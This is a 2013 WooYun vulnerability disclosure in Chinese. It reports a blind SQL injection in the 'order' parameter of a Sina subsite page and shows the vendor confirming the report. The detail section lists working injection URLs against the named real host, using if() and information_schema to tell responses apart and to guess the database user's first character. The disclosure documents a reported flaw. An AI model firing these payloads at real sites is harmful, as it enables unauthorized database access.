漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-028321
漏洞标题:新浪某分站SQL注入漏洞(order by注射技巧)
相关厂商:新浪
漏洞作者: MayIKissYou
提交时间:2013-07-09 17:27
修复时间:2013-08-23 17:28
公开时间:2013-08-23 17:28
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:6
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-07-09: 细节已通知厂商并且等待厂商处理中
2013-07-09: 厂商已经确认,细节仅向厂商公开
2013-07-19: 细节向核心白帽子及相关领域专家公开
2013-07-29: 细节向普通白帽子公开
2013-08-08: 细节向实习白帽子公开
2013-08-23: 细节向公众公开
简要描述:
新浪某分站sql注入
详细说明:
1:缺陷url
http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc
2:缺陷参数 order
3:http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if(116>115),1,(select%201%20from%20information_schema.tables))
4:http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if(116<115),1,(select%201%20from%20information_schema.tables))
5:http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if((ascii(mid(current_user(),1,1))>115),1,(select%201%20from%20information_schema.tables))
显示错误
http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if((ascii(mid(current_user(),1,1))>114),1,(select%201%20from%20information_schema.tables))
显示正常
猜解当前用户,第一个字符的ascii为115
漏洞证明:
3:http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if(116>115),1,(select%201%20from%20information_schema.tables))
4:http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if(116<115),1,(select%201%20from%20information_schema.tables))
修复方案:
过滤!
版权声明:转载请注明来源 MayIKissYou@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2013-07-09 17:42
厂商回复:
感谢关注新浪安全,已安排人员进行修复。
最新状态:
暂无